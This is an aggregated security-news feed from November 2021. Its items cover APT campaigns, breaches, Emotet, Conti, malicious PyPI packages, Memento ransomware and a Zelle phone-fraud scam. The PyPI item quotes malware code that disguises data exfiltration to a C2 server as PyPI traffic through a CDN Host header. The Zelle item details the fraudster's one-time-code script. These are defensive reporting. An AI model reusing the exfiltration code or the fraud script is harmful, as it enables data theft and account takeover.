There are new articles available, click to refresh the page.
Before yesterdayGeneral Security News

North Korea-linked TA406 cyberespionage group activity in 2021

19 November 2021 at 15:14

North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns.

A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (KimsukyThallium, and Konni, Black Banshee, Velvet Chollima) has intensified its operations in 2021.

The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October 2020, the US-CERT published a report on Kimusky’s recent activities that provided information of their TTPs and infrastructure.

The APT group mainly targeting think tanks and organizations in South Korea, other victims were in the United States, Europe, and Russia.

Since 2018, Proofpoint researchers tracked the activity associated with TA406 as three distinct threat actors, namely TA406, TA408 and TA427.

Since the beginning of 2021, the TA406 group has carried out multiple credential theft campaigns targeting research, education, government, media and other organizations. TA406 doesn’t usually employ malware in its campaigns, however, researchers tracked two campaigns that were attempting to distribute information-stealer malware.

Malware strains associated with the activity of this nation-state actors include KONNI, SANNY, CARROTBAT/CARROTBALL, BabyShark, Amadey and Android Moez.


From January through June 2021, the cyberespionage group mainly targeted foreign policy experts, journalists and
nongovernmental organizations (NGOs), focusing on entities involved in activities in line with the interest of Pyongyang. In March, the group orchestrated a malware campaign targeting North American entities.

Another campaign conducted in March 2021 targeted several entities not previously observed as targets for TA406. The targets included some of the highest-ranking elected officials of several different governmental institutions, an employee of a consulting firm, government institutions related to defense, law enforcement, and economy and finance, and generic mailboxes for board and customer relations of a large financial institution.

“Generally, TA406 phishing campaigns focus on individuals in North America, Russia and China, with the actors frequently masquerading as Russian diplomats and academics, representatives of the Ministry of Foreign Affairs of the Russian Federation, human rights officials, or Korean individuals. TA406 has also targeted individuals and organizations related to cryptocurrency for the purpose of financial gain.” reads the report.

The group, like other North Korea-linked APT groups has been engaged in financially-motivated attacks, including sextortion and attacks against cryptocurrency.

“Proofpoint anticipates this threat actor will continue to conduct corporate credential theft operations frequently, targeting entities of interest to the North Korean government,” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

The post North Korea-linked TA406 cyberespionage group activity in 2021 appeared first on Security Affairs.

California Pizza Kitchen discloses a data breach

19 November 2021 at 20:14

American pizza chain California Pizza Kitchen (CPK) suffered a data breach that might have exposed personal information of its employees.

American pizza chain California Pizza Kitchen (CPK) suffered a data breach, the company has already notified employees whose personal information might have been exposed.

According to a data breach notification sent to the impacted employees, the security breach was discovered on September 15. The company immediately launched an investigation into the incident with the support of external experts.

“On or about September 15, 2021, CPK discovered suspicious activity in its computing environment. CPK
immediately secured the environment and, with the assistance of third-party computer specialists, launched
an investigation to determine the nature and scope of the incident.” reads the data breach notification. “On or about October 4, 2021, the investigation confirmed that certain files on CPK’s systems could have been accessed without
authorization. CPK therefore undertook a review of the potentially impacted files to identify the information
involved and to whom it related.”

The investigation revealed that the data breach took place on 15 September, 2021, and the total number of current and former CPK employees affected is 103767.

The company claims to have immediately secured its infrastructure, it also declared that it has no evidence that the compromised information might have been misused.

California Pizza Kitchen also says that it took steps to improve the security of its infrastructure to prevent similar incidents in the future.

The company is offering an Experian identity theft protection service for free at the impacted employees.

“We are reviewing existing security policies and have implemented additional measures to further protect against similar incidents moving forward. We also reported the incident to law enforcement and will cooperate with any investigation. We are notifying potentially impacted individuals, including you, so that you may take steps to protect your information.” concludes the company.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

[adrotate banner=”13″

The post California Pizza Kitchen discloses a data breach appeared first on Security Affairs.

The ‘Zelle Fraud’ Scam: How it Works, How to Fight Back

19 November 2021 at 21:36

One of the more common ways cybercriminals cash out access to bank accounts involves draining the victim’s funds via Zelle, a “peer-to-peer” (P2P) payment service used by many financial institutions that allows customers to quickly send cash to friends and family. Naturally, a great deal of phishing schemes that precede these bank account takeovers begin with a spoofed text message from the target’s bank warning about a suspicious Zelle transfer. What follows is a deep dive into how this increasingly clever Zelle fraud scam typically works, and what victims can do about it.

Last week’s story warned that scammers are blasting out text messages about suspicious bank transfers as a pretext for immediately calling and scamming anyone who responds via text. Here’s what one of those scam messages looks like:

Anyone who responds “yes,” “no” or at all will very soon after receive a phone call from a scammer pretending to be from the financial institution’s fraud department. The caller’s number will be spoofed so that it appears to be coming from the victim’s bank.

To “verify the identity” of the customer, the fraudster asks for their online banking username, and then tells the customer to read back a passcode sent via text or email. In reality, the fraudster initiates a transaction — such as the “forgot password” feature on the financial institution’s site — which is what generates the authentication passcode delivered to the member.

Ken Otsuka is a senior risk consultant at CUNA Mutual Group, an insurance company that provides financial services to credit unions. Otsuka said a phone fraudster typically will say something like, “Before I get into the details, I need to verify that I’m speaking to the right person. What’s your username?”

“In the background, they’re using the username with the forgot password feature, and that’s going to generate one of these two-factor authentication passcodes,” Otsuka said. “Then the fraudster will say, ‘I’m going to send you the password and you’re going to read it back to me over the phone.'”

The fraudster then uses the code to complete the password reset process, and then changes the victim’s online banking password. The fraudster then uses Zelle to transfer the victim’s funds to others.

An important aspect of this scam is that the fraudsters never even need to know or phish the victim’s password. By sharing their username and reading back the one-time code sent to them via email, the victim is allowing the fraudster to reset their online banking password.

Otsuka said in far too many account takeover cases, the victim has never even heard of Zelle, nor did they realize they could move money that way.

“The thing is, many credit unions offer it by default as part of online banking,” Otsuka said. “Members don’t have to request to use Zelle. It’s just there, and with a lot of members targeted in these scams, although they’d legitimately enrolled in online banking, they’d never used Zelle before.” [Curious if your financial institution uses Zelle? Check out their partner list here].

Otsuka said credit unions offering other peer-to-peer banking products have also been targeted, but that fraudsters prefer to target Zelle due to the speed of the payments.

“The fraud losses can escalate quickly due to the sheer number of members that can be targeted on a single day over the course of consecutive days,” Otsuka said.

To combat this scam Zelle introduced out-of-band authentication with transaction details. This involves sending the member a text containing the details of a Zelle transfer – payee and dollar amount – that is initiated by the member. The member must authorize the transfer by replying to the text.

Unfortunately, Otsuka said, the scammers are defeating this layered security control as well.

“The fraudsters follow the same tactics except they may keep the members on the phone after getting their username and 2-step authentication passcode to login to the accounts,” he said. “The fraudster tells the member they will receive a text containing details of a Zelle transfer and the member must authorize the transaction under the guise that it is for reversing the fraudulent debit card transaction(s).”

In this scenario, the fraudster actually enters a Zelle transfer that triggers the following text to the member, which the member is asked to authorize: For example:

“Send $200 Zelle payment to Boris Badenov? Reply YES to send, NO to cancel. ABC Credit Union . STOP to end all messages.”

“My team has consulted with several credit unions that rolled Zelle out or our planning to introduce Zelle,” Otsuka said. “We found that several credit unions were hit with the scam the same month they rolled it out.”

The upshot of all this is that many financial institutions will claim they’re not required to reimburse the customer for financial losses related to these voice phishing schemes. Bob Sullivan, a veteran journalist who writes about fraud and consumer issues, says in many cases banks are giving customers incorrect and self-serving opinions after the thefts.

“Consumers — many who never ever realized they had a Zelle account – then call their banks, expecting they’ll be covered by credit-card-like protections, only to face disappointment and in some cases, financial ruin,” Sullivan wrote in a recent Substack post. “Consumers who suffer unauthorized transactions are entitled to Regulation E protection, and banks are required to refund the stolen money. This isn’t a controversial opinion, and it was recently affirmed by the CFPB here. If you are reading this story and fighting with your bank, start by providing that link to the financial institution.”

“If a criminal initiates a Zelle transfer — even if the criminal manipulates a victim into sharing login credentials — that fraud is covered by Regulation E, and banks should restore the stolen funds,” Sullivan said. “If a consumer initiates the transfer under false pretenses, the case for redress is more weak.”

Sullivan notes that the Consumer Financial Protection Bureau (CFPB) recently announced it was conducting a probe into companies operating payments systems in the United States, with a special focus on platforms that offer fast, person-to-person payments.

“Consumers expect certain assurances when dealing with companies that move their money,” the CFPB said in its Oct. 21 notice. “They expect to be protected from fraud and payments made in error, for their data and privacy to be protected and not shared without their consent, to have responsive customer service, and to be treated equally under relevant law. The orders seek to understand the robustness with which payment platforms prioritize consumer protection under law.”

Anyone interested in letting the CFPB know about a fraud scam that abused a P2P payment platform like Zelle, Cashapp, or Venmo, for example, should send an email describing the incident to [email protected] Be sure to include Docket No. CFPB-2021-0017 in the subject line of the message.

In the meantime, remember the mantra: Hang up, Look Up, and Call Back. If you receive a call from someone warning about fraud, hang up. If you believe the call might be legitimate, look up the number of the organization supposedly calling you, and call them back.

Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping

19 November 2021 at 22:47

A Canadian teen has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency.

A Canadian teenager has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency from an American individual.

The news of the arrest was disclosed by the Hamilton Police in Ontario, Canada, as a result of a joint investigation conducted by the FBI and the United States Secret Service Electronic Crimes Task Force that started in March 2020.

The cryptocurrency has been stolen through a SIM swapping attack that allowed the attackers to bypass 2FA used to protect the wallets containing the funds.

“The victim had been targeted by a SIM swap attack, a method of hijacking valuable accounts by manipulating cellular network employees to duplicate phone numbers so threat actors can intercept two-factor authorization requests.” reads the announcement published by the police. “As a result of the SIM swap attack, approximately $46 million CAD worth of cryptocurrency was stolen from the victim. This is currently the biggest cryptocurrency theft reported from one person.”

The police revealed that some of the stolen cryptocurrency was used to purchase an online username that was rare in the gaming community. The analysis of the transaction associated with the purchase allowed the investigators to unmask the account holder of the rare username.

The police arrested the man for theft over $5,000.00 and possession of property or proceeds of property obtained by crime.

Hamilton Police made multiple seizures for a total value of $7 million CAD.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency )

The post Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping appeared first on Security Affairs.

Tor Project calls to bring more than 200 obfs4 bridges online by December

20 November 2021 at 00:54

The Tor Project offers rewards to users who will set up a Tor server after observing a significant drop in the number of Tor relays and Tor bridges.

Bridges are private Tor relays that allow users to circumvent censorship, their role is essential in countries, that block Tor connections such as China, Belarus, Iran, and Kazakhstan.

Unfortunately, maintainers of the project reported that the number of Tor bridges has decreased since January, for this reason, they are urging users to set up new servers.

Tor Project Relays

“We currently have approximately 1,200 bridges, 900 of which support the obfs4 obfuscation protocol. Unfortunately, these numbers have been decreasing since the beginning of this year. It’s not enough to have many bridges: eventually, all of them could find themselves in block lists. We therefore need a constant trickle of new bridges that aren’t blocked anywhere yet. This is where we need your help.” reads the announcement published by the Tor Project.

The Tor Project aims at bringing more than 200 obfs4 bridges online by the end of this year with the support of the users. The maintainer at the project are offering unique and exclusive Tor reward kits. Users that will run 10 obfs4 bridges for one year, will receive a Golden Gate bridge kit, including 1 Tor hoodie, 2 Tor T-shirts, and a sticker pack.

Below are the kits offered by the Tor Project:

1. Golden Gate bridge (limited to 10 kits)

  • Run 10 obfs4 bridges for 1 year.
  • Reward kit: 1 Tor hoodie + 2 Tor T-shirt + stickers pack.

2. Helix bridge (limited to 20 kits)

  • Run 5 obfs4 bridges for 1 year.
  • Reward kit: 1 Tor T-shirt + stickers pack.

3. University bridge kit (limited to 10 kits)

  • Run 2 obfs4 bridges for 1 year in your university.
  • Reward kit: 1 Tor T-shirt + stickers pack.

4. Rialto bridge (randomly select 10 new bridge operator)

  • Run 1 obfs4 bridge for 1 year and you will be part of the ‘reward lottery’.
  • We will randomly select 10 new bridge operators to receive a metallic roots Tor t-shirt as a token of our gratitude for your help defending the open internet.

The offer will be available until January 7, 2022.

The announcement includes instructions to set up a bridge and technical requirements.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Tor)

The post Tor Project calls to bring more than 200 obfs4 bridges online by December appeared first on Security Affairs.

The newer cybercrime triad: TrickBot-Emotet-Conti

20 November 2021 at 12:23

Advanced Intelligence researchers argue that the restarting of the Emotet botnet was driven by Conti ransomware gang.

Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird, which disrupted the EMOTET botnet. At the time the investigators have taken control of its infrastructure in an international coordinated action. 

This operation was the result of a joint effort between authorities in the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine, with international activity coordinated by Europol and Eurojust.

The law enforcement agency was able to take over at least 700 servers used as part of the Emotet botnet’s infrastructure. The FBI collected millions of email addresses used by Emotet operators in their malware campaigns as part of the cleanup operation.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as Trickbot and QBot trojans, or ransomware such as ContiProLockRyuk, and Egregor.

Last week researchers from multiple cybersecurity firms ([Cryptolaemus], [GData], and [Advanced Intel]) reported that threat actors are using the TrickBot malware to drop an Emoted loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

Researchers from AdvIntel believe that the return will have a significant impact on the ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond due to three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demanded of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad resulted from the first two points.

The Emotet botnet was resurrected by its former operator, who was convinced by the Conti ransomware gang. The shutdown of the Emotet operation resulted in the lack of high-quality initial access brokers.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including Conti, DoppelPaymer, Egregor, ProLock, Ryuk, and others).

“Most likely because no other groups were able to replicate such capabilities, after leaving cyberspace in January 2021, Emotet left a vacuum that was not filled even with MASSLOADER, also known as Hancitor. Other botnets like QBot attempted to step in but largely failed as a persistent and continuous loader system.” states the report published by AdvIntel. “This created a major interruption within the ransomware supply chains. After the takedown of Emotet, the demand for an efficient source of high-quality access and advanced dissemination was not matched with a proper supply.”

The vacuum left by Emotet shutdown urged the EMOTET resurgence important, for this reason its return will have a major impact on the threat landscape. The researchers believe that one reason that contributed to multiple ransomware-as-a-service (RaaS) operations shutting down this year (BabukDarkSideBlackMatterREvilAvaddon) was that affiliates used low-level access sellers and brokers (RDP, vulnerable VPN, poor quality spam).

With RaaSes disappearing, traditional groups like Ryuk (Conti), TA505, and EvilCorp regained a pivotal role in the threat landscape attracting talented malware specialists searching for a stable and ordered operational environment.

In this scenario, the alliance between the Conti group, Trickbot gang, and Emotet’s operators could push up the ransomware operations. The Conti operations will leverage Emotet to deliver their payload to high-value targets.

“Emotet’s return is not coincidental, it is caused by major shifts in the overall cybercrime domain. The growing monopolization of the ransomware world, which is rapidly conquered by only a few highly-organized criminal corporations, leads to better opportunities for criminal ventures like the Emotet botnet developers.” concludes the analysis. “Larger organized crime groups have higher profits working together in a liaison. This has been proven by the alliance of TrickBot, Emotet, and Ryuk: the three major players of the pre-2019 cybercrime hierarchy. In late 2021, as the smaller actors are losing their impact and power, while larger ones are becoming even bigger, the new criminal alliance between TrickBot, Emotet, and Conti, is a logical avenue for criminals.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)

The post The newer cybercrime triad: TrickBot-Emotet-Conti appeared first on Security Affairs.

Study reveals top 200 most common passwords

20 November 2021 at 15:07

The annual study on top-used passwords published by Nordpass revealed that we are still using weak credentials that expose us to serious risks.

Nordpass has published its annual report, titled “Top 200 most common passwords,” on the use of passwords. The report shows that we are still using weak passwords.

The list of passwords was compiled with the support of independent researchers specializing in data breach analysis., the study is based on the analysis of a 4TB database containing passwords across 50 countries.

Most used passwords are still 123456, 123456789, 12345, qwerty, and “password”. Businesses fail to enforce strong passwords, and rarely request employees to enable multi-factor authentication (MFA). 

The report revealed that the most common passwords in 2021 were:

  1. 123456 (103,170,552 hits)
  2. 123456789 (46,027,530 hits)
  3. 12345 (32,955,431 hits)
  4. qwerty (22,317,280 hits)
  5. password (20,958,297 hits)
  6. 12345678 (14,745,771 hits)
  7. 111111 (13,354,149 hits)
  8. 123123 (10,244,398 hits)
  9. 1234567890 (9,646,621 hits)
  10. 1234567 (9,396,813 hits)

Below is the map showing password leaks per capita:

top used passwords

According to the report, a stunning number of people have the bad habit of using their own name as a password. While “Liverpool” might be the most popular team in the world, while “Ferrari” and “Porsche” are the most popular car brands worldwide. 

The “iloveyouis” password is used more by women, in the US, the number of women using it is 222,287 while the number of men using the same password is 96,785.

Below are the password hygiene basics provided by the experts:

  • Use complex passwords containing at least 12 characters and a varied combination of upper and lowercase letters, numbers, and symbols. Password generator could be easily generate them.
  • Never reuse passwords for multiple accounts.
  • Regularly update passwords, experts recommend changing passwords every 90 days.
  • Check password strength
  • Check password strength – regularly assess your password health. Identify weak, reused, or old passwords and fortify your online security with new, complex ones.
  • Use a password manager.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, top-used passwords)

The post Study reveals top 200 most common passwords appeared first on Security Affairs.

North Korean Hackers Found Behind a Range of Credential Theft Campaigns

20 November 2021 at 15:26
A threat actor with ties to North Korea has been linked to a prolific wave of credential theft campaigns targeting research, education, government, media and other organizations, with two of the attacks also attempting to distribute malware that could be used for intelligence gathering. Enterprise security firm Proofpoint attributed the infiltrations to a group it tracks as TA406, and by the

RedCurl Corporate Espionage Hackers Return With Updated Hacking Tools

20 November 2021 at 15:54
A corporate cyber-espionage hacker group has resurfaced after a seven-month hiatus with new intrusions targeting four companies this year, including one of the largest wholesale stores in Russia, while simultaneously making tactical improvements to its toolset in an attempt to thwart analysis. "In every attack, the threat actor demonstrates extensive red teaming skills and the ability to bypass

U.S. banking regulators order banks to notify cybersecurity incidents in 36 hours

20 November 2021 at 22:43

U.S. banking regulators have approved a new rule that orders banks to notify federal regulators of significant cybersecurity incidents within 36 hours.

U.S. banking regulators this week approved a rule that obliges banks to report any major cybersecurity incidents to the government within 36 hours of discovery. Major cybersecurity incidents are attacks that impact operations of the victims or the stability of the US financial sector.

The rule was approved by the Federal Reserve, Federal Deposit Insurance Corporation and Office of the Comptroller of the Currency. The rule aims at forcing banks to quickly respond to cybersecurity incidents.

The rule also required financial institutions to notify customers “as soon as possible” if the attack has caused problems lasting four or more hours.

According to the Reuters, the banking industry had successfully completed a massive cross-industry cyber security drill to test the response to a ransomware attack that threatens to disrupt a range of financial services.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, U.S. banking)

The post U.S. banking regulators order banks to notify cybersecurity incidents in 36 hours appeared first on Security Affairs.

Security Affairs newsletter Round 341

20 November 2021 at 23:41

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

U.S. banking regulators order banks to notify cybersecurity incidents in 36 hours
Study reveals top 200 most common passwords
The newer cybercrime triad: TrickBot-Emotet-Conti
Tor Project calls to bring more than 200 obfs4 bridges online by December
Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping
California Pizza Kitchen discloses a data breach
North Korea-linked TA406 cyberespionage group activity in 2021
Conti ransomware operations made at least $25.5 million since July 2021
Android banking Trojan BrazKing is back with significant evasion improvements
Microsoft addresses a high-severity vulnerability in Azure AD
Attackers deploy Linux backdoor on e-stores compromised with software skimmer
Zero-Day flaw in FatPipe products actively exploited, FBI warns
Phishing campaign targets Tiktok influencer accounts
US, UK and Australia warn of Iran-linked APTs exploiting Fortinet, Microsoft Exchange flaws
Netgear fixes code execution flaw in many SOHO devices
CISA releases incident response plans for federal agencies
The rise of millionaire zero-day exploit markets
Iran-linked APT groups continue to evolve
Mandiant links Ghostwriter operations to Belarus
GitHub addressed two major vulnerabilities in the NPM package manager
Adult cam site StripChat exposes the data of millions of users and cam models
Intel addresses 2 high-severity issues in BIOS firmware of several processors
SharkBot, a new Android Trojan targets banks in Europe
Operation Reacharound – Emotet malware is back
Cloudflare mitigated 2 Tbps DDoS attack, the largest attack it has seen to date
North Korea-linked Lazarus group targets cybersecurity experts with Trojanized IDA Pro
Microsoft rolled out emergency updates to fix Windows Server auth failures
Happy 10th Birthday, Security Affairs
QAKBOT Trojan returns using Squirrelwaffle as a dropper
Two Sony PS5 exploits disclosed the same day
ENISA – The need for Incident Response Capabilities in the health sector
Updated: Hundreds of thousands of fake warnings of cyberattacks sent from a hacked FBI email server
FTC shares guidance for small businesses to prevent ransomware attacks
Threat Report Portugal: Q3 2021

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 341 appeared first on Security Affairs.

Attackers compromise Microsoft Exchange servers to hijack internal email chains

21 November 2021 at 11:12

A malware campaign aimed at Microsoft Exchange servers exploits ProxyShell and ProxyLogon issues and uses stolen internal reply-chain emails.

A malware campaign aimed at Microsoft Exchange servers exploits ProxyShell and ProxyLogon issues and uses stolen internal reply-chain emails to avoid detection.

The campaign was uncovered by TrendMicro researchers that detailed the technique used to trick victims opening the malicious email used as the attack vector.

The attacks were orchestrated by Squirrelwaffle, a threat actor known for sending malicious spam as replies to existing email chains.

The investigation into three incidents revealed that attackers used exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell).

Once compromised the Exchange servers, threat actors use the access to reply to the company’s internal emails in reply-chain attacks containing links to weaponized documents. Sending the messages from the organizations allow the attackers to bypass detection.

“In the same intrusion, we analyzed the email headers for the received malicious emails, the mail path was internal (between the three internal exchange servers’ mailboxes), indicating that the emails did not originate from an external sender, open mail relay, or any message transfer agent (MTA).” reads the analysis published by Trend Micro. “Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails.”

The emails originate from the same internal network, appear to be a continuation of a previous discussion between two employees.

The attacker did not use tools for lateral movement or execute malware on the Exchange servers to avoid detection.

The emails use weaponized Office documents or include a link to them. Upon enabling the content, malicious macros are executing to download and install the malware, such as Qbot, Cobalt Strike, and SquirrelWaffle.

The excel sheets used in this campaign contain malicious Excel 4.0 macros used to download and execute the malicious DLL.

microsoft exchange servers

Experts recommend securing their Microsoft Exchange servers by installing security updates published by Microsoft.

“As mentioned earlier, by exploiting ProxyLogon and ProxyShell attackers were able to bypass the usual checks that would have stopped the spread of malicious email.” concludes the analysis. “It is important to ensure that patches for Microsoft Exchange Server vulnerabilities, specifically ProxyShell and ProxyLogon (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) have already been applied.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ProxyLogon)

The post Attackers compromise Microsoft Exchange servers to hijack internal email chains appeared first on Security Affairs.

Researchers were able to access the payment portal of the Conti gang

21 November 2021 at 15:01

The Conti ransomware group has suffered a data breach that exposed its attack infrastructure and allowed researcher to access it.

Researchers at security firm Prodaft were able to identify the real IP address of one of the servers used by the Conti ransomware group and access the console for more than a month. The exposed server was hosting the payment portal used by the gang for ransom negotiation with he victims.

“The PTI team accessed Conti’s infrastructure and identified the real IP addresses of the servers in question.” reads the report published by the experts. “Our team detected a vulnerability in the recovery servers that Conti uses, and leveraged that vulnerability to discover the real IP addresses of the hidden service hosting the group’s recovery website”

The experts launched an investigation into the activity of the group with the intent of unmask the Conti affiliates, retailers, developers and servers.

The researchers were able to unmask the real IP address of Conti’s TOR hidden service and contirecovery.ws and The latter is an IP address owned by Ukrainian web hosting company ITL LLC.

Prodaft researchers were able to compromise the server and monitor network traffic for incoming connections, including SSH connections used by Conti members to access the server.

However, the IP addresses associated with SSH connections belonged to Tor exit nodes used by Conti operators to hide their identity.

The experts were also able to determine the OS of the server behind the hidden service, a Debian distro with hostname ”dedic-cuprum-617836”. Experts speculate the numeric value in the hostname is an invoice number for the server, assigned by the hosting company ITLDC.

Linux version 4.9.0-16-amd64 (Debian 6.3.0-18deb9u1) #1 SMP Debian 4.9.272-2
(2021-07-19) dedic-cuprum-617836.hosted-by-itldc.com dedic-cuprum-617836

The security firm shared its findings with law enforcement authorities.

The experts also shared the contents of htpasswd file of the subject host that can be used in future investigations on the Conti operations.

The PTI team was also able to discover multiple victim chat sessions and captured login credentials for MEGA accounts used while contacting the victims. Experts were able to discover the connecting IP addresses, dates, the purchase method, and the software used for accessing the file sharing and upload service.

After the publishing of the report, the Conti operators have taken their payment portal offline, MalwareHunterTeam researchers confirmed.

So, while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down, possible from some hours ago already…
🤔 pic.twitter.com/hmzR463tFP

— MalwareHunterTeam (@malwrhunterteam) November 18, 2021

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Cyclone)

The post Researchers were able to access the payment portal of the Conti gang appeared first on Security Affairs.

Experts found 11 malicious Python packages in the PyPI repository

21 November 2021 at 18:52

Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks.

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with pypi.org.

“The malware’s communication is quite simple:

url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.

The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.

The dependency confusion technique consists of uploading tainted components that have the same name as the legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique tricks the target’s package manager into downloading and installing the malicious module.

The “ipboards” and “pptest” packages were discovered using DNS tunneling for data exfiltration, this is the first time that this technique has been used by malicious pac in malware uploaded to PyPI.

“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Cyclone)

The post Experts found 11 malicious Python packages in the PyPI repository appeared first on Security Affairs.

US SEC warns investors of ongoing fraudulent communications claiming from the SEC

22 November 2021 at 06:27

The Securities and Exchange Commission (SEC) warns investors of attacks impersonating its officials in government impersonator schemes.

The Securities and Exchange Commission (SEC) is warning investors of scammers impersonating SEC officials in fraudulent schemes.

According to the alert issued by the SEC’s Office of Investor Education and Advocacy (OIEA), crooks are contacting investors via phone calls, voicemails, emails, and letters.

“We are aware that several individuals recently received phone calls or voicemail messages that appeared to be from an SEC phone number.  The calls and messages raised purported concerns about unauthorized transactions or other suspicious activity in the recipients’ checking or cryptocurrency accounts.  These phone calls and voicemail messages are in no way connected to the Securities and Exchange Commission.reads the alert.

The alert recommends investors not provide any personal information in case they receive a communication that appears to be from the Securities and Exchange Commission. They are invited to directly contact the commission.

Investors can check the identity of someone behind calls or messages using the SEC’s personnel locator at (202) 551-6000, or call (800) SEC-0330 or email [email protected]

Investors can also file a complaint with the Securities and Exchange Commission’s Office of Inspector General at www.sec.gov/oig or call the OIG’s toll-free hotline at (833) SEC-OIG1 (732-6441).

“Beware of government impersonator schemes. Con artists have used the names of real SEC employees and email messages that falsely appear to be from the Securities and Exchange Commission to trick victims into sending the fraudster’s money. Impersonation of US Government agencies and employees (as well as of legitimate financial services entities) is one common feature of advance fee solicitations and other fraudulent schemes. Even where the fraudsters do not request that funds be sent directly to them, they may use personal information they obtain to steal an individual’s identity or misappropriate their financial assets.” continues the alert.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, SEC)

The post US SEC warns investors of ongoing fraudulent communications claiming from the SEC appeared first on Security Affairs.

Facebook Postpones Plans for E2E Encryption in Messenger, Instagram Until 2023

22 November 2021 at 07:30
Meta, the parent company of Facebook, Instagram, and WhatsApp, disclosed that it doesn't intend to roll out default end-to-end encryption (E2EE) across all its messaging services until 2023, pushing its original plans by at least a year. "We're taking our time to get this right and we don't plan to finish the global rollout of end-to-end encryption by default across all our messaging services

New Memento ransomware uses password-protected WinRAR archives to block access to the files

22 November 2021 at 10:04

Memento ransomware group locks files inside WinRAR password-protected archives after having observed that its encryption process is blocked by security firms.

In October, Sophos researchers have spotted the Memento ransomware that adopts a curious approach to block access to victims’ files. The ransomware copies files into password-protected WinRAR archives, it uses a renamed freeware version of the legitimate file utility WinRAR. The Memento ransomware then encrypts the password and deletes the original files from the victim’s system.

The group initially attempted to encrypt files directly, but its was blocked by defense solutions. Then it changed tactics, using the above process and demanding $1 million to restore the files. The gang also allows the recovery of single files for 0.099 BTC (5036,21 EURO).

Like other groups, the Memento Team threatens data leakage if the victim did not pay the ransom.

The Pyton ransomware is compiled with the PyInstaller, once blocked access to the files it drops a ransom note that instructs the victims to contact the gang via Telegram. Sophos also noticed that the threat actors also deployed an open-source Python-based keylogger on several machines and made later movements within the network using Remote Desktop Protocol and SSH.

The gang was observed exploiting the CVE-2021-21972 vulnerability in VMware vCenter Server for the initial access to target networks.

vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.

The flaw could be exploited by remote, unauthenticated attackers without user interaction.

